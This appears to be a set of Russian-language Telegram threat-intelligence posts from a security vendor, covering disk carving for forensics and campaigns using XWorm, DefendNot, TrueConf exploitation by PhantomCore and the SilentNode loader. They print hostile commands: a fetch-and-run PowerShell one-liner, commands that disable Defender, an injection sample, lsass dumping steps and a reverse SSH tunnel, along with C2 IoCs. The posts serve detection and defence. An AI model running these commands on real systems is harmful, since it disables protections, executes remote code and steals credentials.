He may not, as unvalued persons do, Carve for himself (W. Shakespeare)
При расследовании в инфраструктуре, подвергшейся шифрованию, регулярно возникает необходимость извлечения данных из образов дисков, где файловая система существенно повреждена.
В таких случаях извлечь данные
MFT, логи ОС или юзерские артефакты в состоянии, пригодном для обработки классическими инструментами, возможно далеко не всегда. Это порождает необходимость применения карвинга — восстановления или реконструкции поврежденных файлов. В ряде случаев доступные коммерческие инструменты, реализующие данную технику, дают неплохие результаты, но в целом имеют достаточно ограниченную область применения.В случае карвинга событий журналов ОС Windows хорошо зарекомендовала себя техника «забудь про BinXML»: для полноценного декодирования содержимого полей единичного события необходимы шаблоны, хранящиеся в заголовке чанка, который по понятным причинам может просто отсутствовать. Не пытаясь даже искать такие шаблоны, можно составить текстовое описание единичного события, где однозначно выделяются даты, хранимые в стандартных расположениях, коды событий и несколько других служебных полей, а также декодируемые «как текст» (с вырезанием служебных последовательностей
BinXML) байтовые последовательности, содержащие данные для подстановки в шаблоны.В итоге подобная техника позволяет получить существенно больше данных, нежели при попытке восстановления чанков
EVTX: имея дату, код события EventID и тип журнала, хранимый в виде текста, можно понять, о чем идет речь (скриншот 1).Схожий подход может применяться и для «живых» систем, где атакующие предприняли попытку удаления данных с целью сокрытия следов своих перемещений.
🔎 Для поиска остаточных данных таблицы
MFT, помимо восстановления единичных записей стандартного формата, в ряде случаев хорошо работает техника поиска единичных атрибутов: как правило, ценность представляют атрибуты типа 0x30, то есть $FILE_NAME, содержащие четыре метки времени, имя файла и его размер (скриншот 2). В отдельных случаях такие единичные атрибуты даже для «живой» системы позволяют обнаружить, например, в файле подкачки (pagefile.sys) следы присутствия вредоносных файлов, отсутствующие в других артефактах. Подобные результаты также возможно получить с помощью поиска USN-записей, содержащих одну метку времени и имя файла, с которым производились какие-либо операции ФС (скриншот 3).💽 Для поиска исполняемых файлов в образе диска хорошо работает тактика поиска заголовка
PE с последующей оценкой размера файла по совокупному размеру секций. При небольшом усложнении алгоритма возможно реализовать более точный подход: определение энтропии конечных фрагментов файла с последовательным уменьшением размера фрагмента до момента перехода эмпирически определенного порогового значения «снизу вверх» при соблюдении паддинга в ряде случаев позволяет получить исполняемые файлы с совпадением по хешу. Однако даже «вырубленные топором» исполняемые файлы ВПО или их фрагменты прекрасно детектируются с помощью YARA-правил (скриншоты 4, 5).📁 Для восстановления файлов реестра возможно использование поиска по заголовку с определением размера файла по полю
HiveBinsDataSize: данное приближение в ряде случаев позволяет получить набор файлов, пригодных для обработки классическими инструментами. Характерной особенностью в данном случае является наличие в заголовке даты модификации и типа файла (primary/log), а также имени файла в UTF-16 размером 64 байта. Несмотря на то что для некоторых потенциально интересных с точки зрения форензики файлов (UsrClass.dat) структура пути не позволяет определить с достаточной точностью исходное размещение файла, для большинства случаев имеющейся информации вполне достаточно.Наконец, прекрасно зарекомендовала себя техника поиска в образе диска читаемых текстовых фрагментов, ассоциируемых с выявленным инструментарием атакующих: в ряде случаев она позволяет восстановить командлайны и логи использованных инструментов, включая пароли, имена УЗ и подобные «приятные мелочи» (скриншот 6).
#yara #dfir #ir #windows
@ptescalator
🔥16❤12👍7
Использование DefendNot в атаках с XWorm 🪱
Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (скриншот 1). В ходе анализа были идентифицированы две параллельно используемые злоумышленниками цепочки доставки, различающиеся по начальному вектору, но сходящиеся на единой инфраструктуре и финальном вредоносном компоненте.
🌹 Отдельно примечателен выбор инфраструктуры: для распространения компонентов используется GitHub-репозиторий death-note. Забавно, что автор отсылает к известному произведению Death Note, где старшеклассник получает в руки особую тетрадь.
• В первой цепочке в качестве первичного стейджа использовались VBScript-файлы (скриншот 2), содержащие обфусцированный скрипт. После запуска жертвой VBS-файла происходило скачивание с GitHub-репозитория злоумышленника текстового файла-приманки (скриншот 3) и его запуск для создания видимости легитимного процесса, а также выгрузка и запуск вредоносного VBE-скрипта «
Указанный скрипт выполнял деактивацию средств защиты Windows, в том числе Microsoft Defender с использованием проекта DefendNot, а также дропал и запускал дополнительный модуль
После этого запускался DefendNot, который регистрирует фиктивный антивирус через Windows Security Center и переводит Defender в отключенное состояние штатными средствами ОС. Завершающим этапом из того же репозитория загружался и запускался исполняемый файл, идентифицированный как XWorm RAT.
• Во второй цепочке в начальном стейдже использовались LNK-файлы. Ярлык либо напрямую загружал и исполнял PowerShell-скрипт из GitHub-репозитория, либо выполнял эквивалентную команду в Base64-представлении (скриншот 4). Запущенный PowerShell-скрипт (скриншот 5) создавал текстовый файл, заполнял его псевдослужебным (скриншот 3) содержимым и открывал для пользователя, маскируя вредоносную активность под офисный документооборот. После этого скрипт загружал из того же GitHub-репозитория файл
🕵️ Изучив метаданные семплов XWorm, нам удалось обнаружить более ранние атаки, датируемые концом сентября, где вместо GitHub-репозитория распространение ВПО осуществлялось через облачные файловые хранилища, такие как Dropbox, Box и Яндекс.Диск. Это может свидетельствовать об эволюции инфраструктуры распространения и постепенном смещении акцента в сторону GitHub как удобной и менее подозрительной для пользователя площадки доставки.
💡 Отдельного внимания заслуживает использование DefendNot. Изначально он позиционируется как открытый PoC-проект, демонстрирующий возможность регистрации фиктивного антивируса в Windows Security Center и последующего штатного отключения Microsoft Defender без эксплуатации уязвимостей. Базовый сценарий установки и запуска сводится к однострочной команде PowerShell вида:
С ее помощью загружается установочный скрипт, скачивается и распаковывается архив, после чего PoC разворачивается в каталоге
На практике подобные инструменты ранее практически не встречались в реальных атаках, поэтому задокументированное использование DefendNot в кампании указывает на растущую заинтересованность злоумышленников в переиспользовании публичных исследовательских разработок для отключения встроенных средств защиты.
#TI #Phishing #malware #win
@ptescalator
Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (скриншот 1). В ходе анализа были идентифицированы две параллельно используемые злоумышленниками цепочки доставки, различающиеся по начальному вектору, но сходящиеся на единой инфраструктуре и финальном вредоносном компоненте.
• В первой цепочке в качестве первичного стейджа использовались VBScript-файлы (скриншот 2), содержащие обфусцированный скрипт. После запуска жертвой VBS-файла происходило скачивание с GitHub-репозитория злоумышленника текстового файла-приманки (скриншот 3) и его запуск для создания видимости легитимного процесса, а также выгрузка и запуск вредоносного VBE-скрипта «
SCRRC4ryuk.vbe» (скриншот 4).Указанный скрипт выполнял деактивацию средств защиты Windows, в том числе Microsoft Defender с использованием проекта DefendNot, а также дропал и запускал дополнительный модуль
telegram_worker.vbs, отвечающий за скрытую съемку экрана и отправку скриншотов в Telegram с использованием API и бота. Дополнительно перед запуском DefendNot злоумышленники выполняли ряд PowerShell-команд, таких как Set-MpPreference и Add-MpPreference, для отключения механизмов защиты и добавления в исключения каталогов, где размещаются и запускаются вредоносы.После этого запускался DefendNot, который регистрирует фиктивный антивирус через Windows Security Center и переводит Defender в отключенное состояние штатными средствами ОС. Завершающим этапом из того же репозитория загружался и запускался исполняемый файл, идентифицированный как XWorm RAT.
• Во второй цепочке в начальном стейдже использовались LNK-файлы. Ярлык либо напрямую загружал и исполнял PowerShell-скрипт из GitHub-репозитория, либо выполнял эквивалентную команду в Base64-представлении (скриншот 4). Запущенный PowerShell-скрипт (скриншот 5) создавал текстовый файл, заполнял его псевдослужебным (скриншот 3) содержимым и открывал для пользователя, маскируя вредоносную активность под офисный документооборот. После этого скрипт загружал из того же GitHub-репозитория файл
SCRRC4ryuk.vbe с последующим запуском. Дальнейшие стадии полностью совпадают с первой цепочкой и также приводят к развертыванию XWorm RAT на рабочей станции жертвы.💡 Отдельного внимания заслуживает использование DefendNot. Изначально он позиционируется как открытый PoC-проект, демонстрирующий возможность регистрации фиктивного антивируса в Windows Security Center и последующего штатного отключения Microsoft Defender без эксплуатации уязвимостей. Базовый сценарий установки и запуска сводится к однострочной команде PowerShell вида:
irm https://dnot.sh/ | iex
С ее помощью загружается установочный скрипт, скачивается и распаковывается архив, после чего PoC разворачивается в каталоге
C:\Program Files\defendnot\ и запускается. В процессе работы DefendNot добавляет себя в автозагрузку текущего пользователя, сохраняя эффект отключения Defender после перезагрузки.На практике подобные инструменты ранее практически не встречались в реальных атаках, поэтому задокументированное использование DefendNot в кампании указывает на растущую заинтересованность злоумышленников в переиспользовании публичных исследовательских разработок для отключения встроенных средств защиты.
#TI #Phishing #malware #win
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥9💯6❤3
В дополнение к посту 👆
Отключение Defender / MpPreference
Модификация Defender через reg.exe
Defendnot
IoCs:
#TI #Phishing #malware #win
@ptescalator
Отключение Defender / MpPreference
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Add-MpPreference -ExclusionPath 'C:\ProgramData'
Add-MpPreference -ExclusionPath $env:USERPROFILE'\Downloads'
Модификация Defender через reg.exe
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
Defendnot
#Директория по умолчанию
C:\Prorgam Files\defendnot\
#Скачивание и запуск Defendnot
irm https://dnot.sh/ | iex
#Запуск Defendnot в скрытном режиме и добавление задачи в автозагрузку из-под текущего пользователя
"C:\Program Files\defendnot\defendnot-loader.exe" --silent --autorun-as-user
IoCs:
Defendnot
dnot.sh
734d301654affee77396b554ccb04e0e
752e74a143212b9779aa98ec6f736bac
C2 XWorm
tcp.cloudpub.ru:56409
fair-equation.gl.at.ply.gg:57489
lnk-файлы
aebad92d84ae4f4b64748bc94798d401
abd0364a25d1e7ee2bc9320c74e125fc
powershell-файлы
087dbfed9667fb870af265aed35f82e3
ef7b11685c154e54deaf5c26f6d8ea59
85a98d0f58cf08cb7206286b51312661
vbs\vbe-файлы
0bbccecdd13c7b9c4af3273b1ae8e133
ebcb3e0d61ed5774d4e336f5e96ee9b4
9c5a00fe40783497752bcfbd75937fa7
3ec80f2d06dd8f6a8e60d0e8753255e7
xWorm
48bed9e98053e1e3ce0d4fb21fda2804
cab6f558f996db5a80e2a3bd5d443154
82294c916ba0ab95382509f51724716a
092712dc61fce5ef0ad0ddebb90059be
#TI #Phishing #malware #win
@ptescalator
👍10🔥8🤯7❤1
Какой подарок на Новый год вы больше всего ждете? 🎁
Anonymous Poll
21%
Календарь с волчихами 🔞
10%
Отчет об угрозах на 500 страниц 📑
3%
Уведомление об инциденте 🚨
6%
Лицензию на SIEM 🛒
4%
Пачку годных хешей 💼
21%
Выходные 😴
10%
Идеального ИИ-помощника🤖
11%
Согласованный без проблем бюджет на ИБ на следующий год 👌
13%
Не дежурить в Новый год 🎄
1%
Напишу в комментариях 💭
😁11🎄7☃5❤3
Operation CyberPosi 🤔
Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи TrueConf.
Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были выпущены рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security в своем материале.
👀 Пример выполнения команды после эксплуатации от имени процесса
Пример события в журналах для обнаружения фактов компрометации:
Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.
После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления
Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса
• DFIR-утилита для создания дампа оперативной памяти DumpIt (
• библиотека файловой системы Dokan
• утилита для анализа дампов оперативной памяти MemProcFS (
На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:
• HeartDoor
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)
• PhantomSscp (предназначен для создания обратного SSH-туннеля)
• OpenSSH (
• Velociraptor
Особое внимание мы обращаем на установку утилиты Velociraptor, которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими сообщали специалисты Solar 4RAYS.
Пример конфигурации:
Файловые пути и IoCs в посте ниже 🔽
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи TrueConf.
Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были выпущены рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security в своем материале.
tc_server.exe:cmd.exe /s /c "C:\\Program Files\\TrueConf Server\\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||whoami|| /File:"C:\\TrueConf\\activation\\offlinereg.vrg"
Пример события в журналах для обнаружения фактов компрометации:
error: the required argument for option '--Serial' is missing
Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.
После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления
WinRM и RDP. Использование WinRM можно мониторить в событиях Windows, а также в реестре:\Microsoft\Windows\CurrentVersion\WSMAN\SafeClientList\WSManSafeClientList
Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса
lsass, используя для этого такие инструменты, как:• DFIR-утилита для создания дампа оперативной памяти DumpIt (
DumpIt.exe /O dump.dmp)• библиотека файловой системы Dokan
• утилита для анализа дампов оперативной памяти MemProcFS (
memprocfs.exe -device dump.dmp / M:\name\lsass.exe-123\minidump)На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:
• HeartDoor
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)
• PhantomSscp (предназначен для создания обратного SSH-туннеля)
• OpenSSH (
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 [REDACTED]@[REDACTED])• Velociraptor
Особое внимание мы обращаем на установку утилиты Velociraptor, которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими сообщали специалисты Solar 4RAYS.
Пример конфигурации:
version:
name: velociraptor
version: 0.74.2
commit: 121178eb6
build_time: "2025-04-20T01:04:04Z"
...
Client:
server_urls:
- https://telecom-connect.online/
windows_installer:
service_name: WindowsSecurityAgentSvc
install_path: C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
service_description: Windows Security Agent Service
...
Файловые пути и IoCs в посте ниже 🔽
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16🔥13⚡11🙊3🤡1🌚1
В дополнение к посту выше 👆
🐾 Paths
🧑💻 IoCs
HeartDoor
PhantomSscp
MacTunnelRAT
Velociraptor
Stage Hub
SSH Tunnel Control Panel
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
🐾 Paths
c:\Windows\ime\ssh.msi
c:\Windows\ime\k.msi
C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css
C:\Program Files\TrueConf Server\httpconf\site\public\rx.exe
C:\Program Files\TrueConf Server\httpconf\site\public\ws.dll
C:\TrueConf\activation\offlinereg.vrg
C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
C:\Windows\System32\dfxhost.dll
Check-Update.xml
Check-Update.ps1
Create-Check-Update-Task.ps1
🧑💻 IoCs
HeartDoor
8f2f31aaa46920efdfa622b52cd8cd53
fde9563317a0c0249447b123b2137b0e
185.189.12.166
PhantomSscp
e5b540f47ec1707fcd9980ab426be115
4b2ce3df0bae02806a72139b5d9e9a55
486faa9e2efbf78d4c03ba5dfe72eb1d
99ef13d85d2b45cb24a86f1e9923d63a
reserve-safe.online
online-channel.online
infonixsecurity.online
xbox-updater.online
MacTunnelRAT
a346f2145bb7b3cce7c8c8c4d88d4678
c549a2e6533e73ea39bfa466e5e6dcd8
ad64f8c8469c87ed0c395c8936550af6
cyberposi.space
nexaguard.space
solution-itspace.online
moscow-tv.online
analytisec.space
safebloom.space
cloud-update.online
shieldify.online
optivault.space
brightshield.space
trustbeam.space
188.127.227.46
Velociraptor
d91f8fb7ee4ec98bd80bad69d7667842
telecom-connect.online
Stage Hub
31.57.93.105
SSH Tunnel Control Panel
77.73.39.120
191.101.184.123
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
⚡17💯11🆒8👍3❤1🦄1
Что бы из ИБ вы закрепили законодательно в Конституции? 🖊
Anonymous Poll
30%
Ответственное раскрытие результатов инцидентов 💼
11%
Запрет на открытые на периметре RDP 🙅♂️
2%
Держать антивирус выключенным суммарно два часа в год 🧑💻
14%
Процентный штраф за открытие фишингового письма 🎣
5%
Разрешение на игнорирование инцидентов в SIEM 🙈
3%
Понижать критичность одной обнаруженной уязвимости до нуля раз в год 👌
15%
Каждый гражданин имеет право на дыру в безопасности 🕳
5%
Парольев день: раз в год можно поставить любой пароль, и отдел ИБ не смеет противиться 🔐
14%
Пятничные опросы ✔️
2%
Напишу в комментариях 💬
❤7🔥4🥰4😁4🎄2☃1
Тише, тише: новая кампания против стран СНГ 🤫
Во второй половине 2025 года мы обнаружили новую серию атак группы SweetSpecter, нацеленных на страны СНГ (Узбекистан, Туркменистан), в рамках которой злоумышленники распространяли вредоносные документы Microsoft Office (скриншоты 1–3).
Документы были оформлены по единому шаблону и содержали обращение к пользователю с предложением «включить» якобы защищенное содержимое. После открытия файла и активации макросов автоматически выполнялся встроенный скрипт, который декодировал и извлекал закодированное в Base64 содержимое в каталог
• ebook-edit.exe — легитимный исполняемый файл, связанный с редактором электронных книг Calibre;
• Calibre-Launcher.dll — вредоносная библиотека, расшифровывающая и запускающая полезную нагрузку;
• edit2.hlp — зашифрованная полезная нагрузка.
📨 Варианты данной рассылки включали ресурсы, дополнительно зашифрованные однобайтовым XOR. Во вредоносных макросах также присутствовала проверка на наличие запущенного антивирусного процесса
Основная роль
💡 Стоит отметить, что загрузчик проверяет, не искажены ли системные задержки. Для этого создается вспомогательный поток с отложенной сигнализацией события. Основной поток ожидает его с небольшим тайм-аутом. В случае если ожидаемое событие сигнализировано, это означает, что что-то не так, и выполнение прекращается.
Итоговый модуль, который мы назвали SilentNode, при запуске закрепляется в системе, перемещая себя и связанные компоненты (
🔄 После перезагрузки выполнение переходит к сетевому взаимодействию с управляющим сервером — выполняется формирование базовой информации о системе: версии операционной системы, имени компьютера и пользователя, а также сведений о сетевых интерфейсах. Сформированный ответ в результате упаковывается в бинарный контейнер с добавлением идентификатора системы. Данные кодируются с использованием нестандартного варианта Base64 и шифруются алгоритмом
SilentNode по сути является загрузчиком, и основная его функциональность сводится к периодическому опросу C2-сервера, рефлективной загрузке и последующему выполнению полученных от C2 PE-модулей в памяти.
IoCs — в посте ниже 👇
#ti #phishing #malware
@ptescalator
Во второй половине 2025 года мы обнаружили новую серию атак группы SweetSpecter, нацеленных на страны СНГ (Узбекистан, Туркменистан), в рамках которой злоумышленники распространяли вредоносные документы Microsoft Office (скриншоты 1–3).
Документы были оформлены по единому шаблону и содержали обращение к пользователю с предложением «включить» якобы защищенное содержимое. После открытия файла и активации макросов автоматически выполнялся встроенный скрипт, который декодировал и извлекал закодированное в Base64 содержимое в каталог
%APPDATA% под следующими именами:• ebook-edit.exe — легитимный исполняемый файл, связанный с редактором электронных книг Calibre;
• Calibre-Launcher.dll — вредоносная библиотека, расшифровывающая и запускающая полезную нагрузку;
• edit2.hlp — зашифрованная полезная нагрузка.
📨 Варианты данной рассылки включали ресурсы, дополнительно зашифрованные однобайтовым XOR. Во вредоносных макросах также присутствовала проверка на наличие запущенного антивирусного процесса
avp.exe. При наличии антивируса процесс запускался с отображением окна, в противном случае — в скрытом режиме (скриншот 4).Основная роль
Calibre-Launcher.dll сводится к расшифровке и запуску следующего этапа вредоносной цепочки, содержимое которого хранится в файле edit2.hlp и зашифровано с применением алгоритма RC4. Расшифрованная полезная нагрузка начинается с выполнения шелл-кода, который восстанавливает затертые MZ- и PE-сигнатуры, а также корректирует смещения DOS-заголовка. После этого управление передаётся на точку входа восстановленного PE-файла, где начинается основная логика агента.💡 Стоит отметить, что загрузчик проверяет, не искажены ли системные задержки. Для этого создается вспомогательный поток с отложенной сигнализацией события. Основной поток ожидает его с небольшим тайм-аутом. В случае если ожидаемое событие сигнализировано, это означает, что что-то не так, и выполнение прекращается.
Итоговый модуль, который мы назвали SilentNode, при запуске закрепляется в системе, перемещая себя и связанные компоненты (
ebook-edit.exe, Calibre-Launcher.dll и edit2.hlp) в каталог C:\ProgramData\USOShared\Logs, а затем через временный скрипт %TEMP%\c.bat создает задачу планировщика (скриншот 5), обеспечивающую запуск полезной нагрузки каждые две минуты. Завершив процесс закрепления, текущий экземпляр завершает работу и далее перезапускается уже в контексте созданной задачи.🔄 После перезагрузки выполнение переходит к сетевому взаимодействию с управляющим сервером — выполняется формирование базовой информации о системе: версии операционной системы, имени компьютера и пользователя, а также сведений о сетевых интерфейсах. Сформированный ответ в результате упаковывается в бинарный контейнер с добавлением идентификатора системы. Данные кодируются с использованием нестандартного варианта Base64 и шифруются алгоритмом
ChaCha20. В дальнейшем агент в циклическом режиме, делая случайные паузы до одной минуты, отправляет подготовленные сообщения на C2-сервер, используя HTTP POST-запросы, и ожидает ответ. Примечательно, что во всех исследуемых образцах использовался одинаковый endpoint /Search/v<№>.SilentNode по сути является загрузчиком, и основная его функциональность сводится к периодическому опросу C2-сервера, рефлективной загрузке и последующему выполнению полученных от C2 PE-модулей в памяти.
IoCs — в посте ниже 👇
#ti #phishing #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🎄5☃4❤1✍1👍1🗿1
IoCs в дополнение к посту выше 🔼
DOCS
CAlibre-LAuncher.dll
edit2.hlp
C2
Filepath
#ti #phishing #malware
@ptescalator
DOCS
391f30807d3cf333cdc286d1ff5b0f58
0287ba0ecc176ae63ea1d1e053654f32
3eb0b0811c0ab9e87e2ee7f7bac7c46a
22573d874ac9ffa785e57d94e243b48d
f6b126c83ea4a63f277199d7c06617d6
b44a3229ab54f7367ee2acd678bec2d5
CAlibre-LAuncher.dll
4395e8e7351de03faac54492ee2bc874
1100e1d599b5e4f87082670673c8abfb
84533ef6651f38fe162ad2753f1ad788
15c839292684ac6374633d231dbd76a7
e0b008ea6eef411ed6f9faab8f1d3bee
7b00beb5a7ef4a142ebcdcc052b312a3
edit2.hlp
022287b05e4c5ba5503f2b798219f5e9
17134fe1344744cf99a93483f6859212
77dc27fb2ed18f3977241e9475097746
86a164a403a94c8ccd4f0ba383fa943c
906e49f334041ebccc071985ecdcf2ba
5e7b3664311b2daa9ee040b3cff4d82f
C2
www.mubrn.com
188.214.39.243
www.tmtransport.org
194.14.217.146
91.132.94.58
45.153.127.226
Filepath
C:\Users\admin\AppData\Local\Temp\c.bat
C:\ProgramData\USOShared\Logs\edit2.hlp
C:\ProgramData\USOShared\Logs\CAlibre-LAuncher.dll
C:\ProgramData\USOShared\Logs\ebook-edit.exe
#ti #phishing #malware
@ptescalator
👍14☃7🎄6
(C)all (F)or (P)apers!
Ты не понаслышке знаешь, как бороться с реальными киберугрозами: киберразведка, threat hunting, мониторинг в SOC, реагирование и расследование инцидентов? Тогда ждем твое выступление на треке Defense.
Здесь говорят те, кто умеет определять угрозу по одному взгляду на индикаторы атаки, придумывают новые гипотезы и инструменты для отслеживания и поиска угроз, приезжают когда угодно и куда угодно, чтобы помочь справиться с инцидентом.
Мы ждем практиков, которые знают, как выглядит атака в ее реальном исполнении, и готовы поделиться уникальными находками, рабочими инструментами и увлекательными историями.
У каждого эксперта на нашем треке будет 30 минут, чтобы рассказать свой доклад.
Еще не подал доклад? Держи ссылку!
#PHDays
@ptescalator
Ты не понаслышке знаешь, как бороться с реальными киберугрозами: киберразведка, threat hunting, мониторинг в SOC, реагирование и расследование инцидентов? Тогда ждем твое выступление на треке Defense.
Здесь говорят те, кто умеет определять угрозу по одному взгляду на индикаторы атаки, придумывают новые гипотезы и инструменты для отслеживания и поиска угроз, приезжают когда угодно и куда угодно, чтобы помочь справиться с инцидентом.
Мы ждем практиков, которые знают, как выглядит атака в ее реальном исполнении, и готовы поделиться уникальными находками, рабочими инструментами и увлекательными историями.
У каждого эксперта на нашем треке будет 30 минут, чтобы рассказать свой доклад.
Еще не подал доклад? Держи ссылку!
#PHDays
@ptescalator
🔥14☃9🎉9🍾4❤1👎1🎄1
Фантом во плоти 👻
Летом 2025 года команда Threat Intelligence экспертного центра кибербезопасности Positive Technologies проанализировала операцию Phantom Enigma, преимущественно направленную на жителей Бразилии с целью кражи банковских аккаунтов. Помимо атак на обычных пользователей, были зафиксированы атаки на организации по всему миру с целью расширения инфраструктуры для дальнейших атак.
Пользователи заражались вредоносным расширением для браузеров Firefox, Google Chrome и Microsoft Edge, в то время как инфраструктура организаций оказывалась под контролем инструментов для удаленного управления, например PDQ Connect или Mesh Agent.
🍂 Осенью 2025 года специалисты группы киберразведки также фиксировали подобные атаки, наблюдая изменения в инструментарии и техниках закрепления. Например, появились новые инструменты класса RMM, изменилась логика работы сервера злоумышленников, а окна браузеров Microsoft Edge и Google Chrome у жертв начали пересекать новые пространства.
👀 В нашей статье мы рассказали, какие атаки были обнаружены, что изменилось и насколько действия группировки Phantom Enigma массовые (спойлер:достаточно ).
#TI #APT
@ptescalator
Летом 2025 года команда Threat Intelligence экспертного центра кибербезопасности Positive Technologies проанализировала операцию Phantom Enigma, преимущественно направленную на жителей Бразилии с целью кражи банковских аккаунтов. Помимо атак на обычных пользователей, были зафиксированы атаки на организации по всему миру с целью расширения инфраструктуры для дальнейших атак.
Пользователи заражались вредоносным расширением для браузеров Firefox, Google Chrome и Microsoft Edge, в то время как инфраструктура организаций оказывалась под контролем инструментов для удаленного управления, например PDQ Connect или Mesh Agent.
🍂 Осенью 2025 года специалисты группы киберразведки также фиксировали подобные атаки, наблюдая изменения в инструментарии и техниках закрепления. Например, появились новые инструменты класса RMM, изменилась логика работы сервера злоумышленников, а окна браузеров Microsoft Edge и Google Chrome у жертв начали пересекать новые пространства.
👀 В нашей статье мы рассказали, какие атаки были обнаружены, что изменилось и насколько действия группировки Phantom Enigma массовые (спойлер:
#TI #APT
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
✍10🔥7🎅5❤1🎄1